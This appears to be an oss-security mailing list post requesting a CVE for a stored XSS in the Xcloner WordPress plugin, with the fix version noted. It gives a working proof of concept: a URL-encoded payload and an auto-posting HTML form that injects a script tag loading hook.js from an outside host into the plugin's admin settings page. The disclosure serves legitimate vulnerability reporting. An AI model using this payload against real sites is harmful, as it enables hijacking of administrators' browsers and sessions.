oss-security - CVE request : a stored XSS in Xcloner for wordpress

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [day] [month] [year] [list]

Message-ID: <3626D6E697A150459C44C0E5D8D8D00E0DBE8BDF@EX02.corp.qihoo.net>
Date: Wed, 27 Jul 2016 02:35:46 +0000
From: limingxing <limingxing@....cn>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: CVE request : a stored XSS in Xcloner for wordpress

Hi

     I found a stored XSS in Xcloner for wordpress.  The XSS filter can 
be bypass.

     Here is the plugin page
     https://wordpress.org/plugins/xcloner-backup-and-restore/

     PoC

     In the "Corn setting" page(URL is 
"http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"), 
set the "Backup name" (corn_bname) like 
"1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

     <html>
         <form 
action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" 
method="post">
             <input type="hidden" name="cron_bname" 
value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" 
/>
             <input type="submit" name="submit">
         </form>
     </html>


     Fix way
     Update to version 3.1.5

     Change

     https://plugins.trac.wordpress.org/changeset/1456784


     Could you assign a CVE ID for it?

Chen Ruiqi
Codesafe Team

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.